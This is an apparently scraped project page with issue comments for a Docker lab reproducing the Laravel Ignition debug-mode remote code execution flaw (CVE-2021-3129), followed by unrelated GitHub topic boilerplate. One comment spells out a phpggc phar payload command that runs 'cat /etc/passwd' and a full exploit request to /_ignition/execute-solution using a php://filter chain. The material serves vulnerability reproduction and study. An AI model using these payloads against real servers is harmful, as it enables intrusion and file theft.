Laravel debug rce
Laravel debug rce
执行docker-compse up -d启动环境
访问8888端口后点击首页面的generate key就可以复现了
关于docker环境想说的几点:
脚本已放出,脚本要和phpggc项目文件夹在同一级目录下。
通用性不强(至少打我自己的环境可以),大家可自行把phpggc的其它rce链也加进去,提高通杀能力。
https://www.ambionics.io/blog/laravel-debug-rce
https://xz.aliyun.com/t/9030#toc-3
https://blog.csdn.net/csdn_Pade/article/details/112974809
安装好后版本是Laravel v8.44.0 (PHP v7.3.25)?而且复现也失败了
Hi,
Thank you for your test environment. I tried to craft the payload by using
php -d "phar.readonly=0" ./phpggc monolog/rce1 system "cat /etc/passwd" --phar phar -o php://output | base64 -w 0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:] + '=00' for i in sys.stdin.read()]).upper())"
And I can decode back to phar file by using request as below
POST /_ignition/execute-solution HTTP/1.1
Host: <REDACT.COM>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 301
{
"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
"parameters": {
"variableName": "username",
"viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log "
}
}
and when I check at /src/storage/logs/laravel.log , the decode request is work well.
but when I tried to exploit with phar insecure deserialization in the last step.
It said "SHA1 signature could not be verified: broken signature in file " and exploit unsuccess. Do you have any suggest to exploit correctly?
How can I run it?
root@kali:/home/kali/Desktop/CVE-2021-3129# docker-compose up -d
Building with native build. Learn about native build in Compose here: https://docs.docker.com/go/compose-native-build/
Building laravel_debug_rce
Sending build context to Docker daemon 411.1kB
Step 1/6 : FROM php:7.3.25-alpine
---> 5b879b6b3734
Step 2/6 : COPY laravel /src
---> Using cache
---> e9eb2c7b53b0
Step 3/6 : WORKDIR /src
---> Using cache
---> d7eab59d127e
Step 4/6 : RUN cp .env.example .env && php -r "copy('https://install.phpcomposer.com/installer', 'composer-setup.php');" && php composer-setup.php && php -r "unlink('composer-setup.php');" && mv composer.phar /usr/local/bin/composer && chmod +x /usr/local/bin/composer && composer config -g repo.packagist composer https://mirrors.aliyun.com/composer/ && composer install && composer require facade/ignition==2.5.1 && mv /usr/local/etc/php/php.ini-production /usr/local/etc/php/php.ini && sed -i 's/;phar.readonly = On/phar.readonly = 0/g' /usr/local/etc/php/php.ini
---> Running in 68de553d9d16
Warning: copy(): php_network_getaddresses: getaddrinfo failed: Try again in Command line code on line 1
Warning: copy(https://install.phpcomposer.com/installer): failed to open stream: php_network_getaddresses: getaddrinfo failed: Try again in Command line code on line 1
Could not open input file: composer-setup.php
The command '/bin/sh -c cp .env.example .env && php -r "copy('https://install.phpcomposer.com/installer', 'composer-setup.php');" && php composer-setup.php && php -r "unlink('composer-setup.php');" && mv composer.phar /usr/local/bin/composer && chmod +x /usr/local/bin/composer && composer config -g repo.packagist composer https://mirrors.aliyun.com/composer/ && composer install && composer require facade/ignition==2.5.1 && mv /usr/local/etc/php/php.ini-production /usr/local/etc/php/php.ini && sed -i 's/;phar.readonly = On/phar.readonly = 0/g' /usr/local/etc/php/php.ini' returned a non-zero code: 1
ERROR: Service 'laravel_debug_rce' failed to build
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.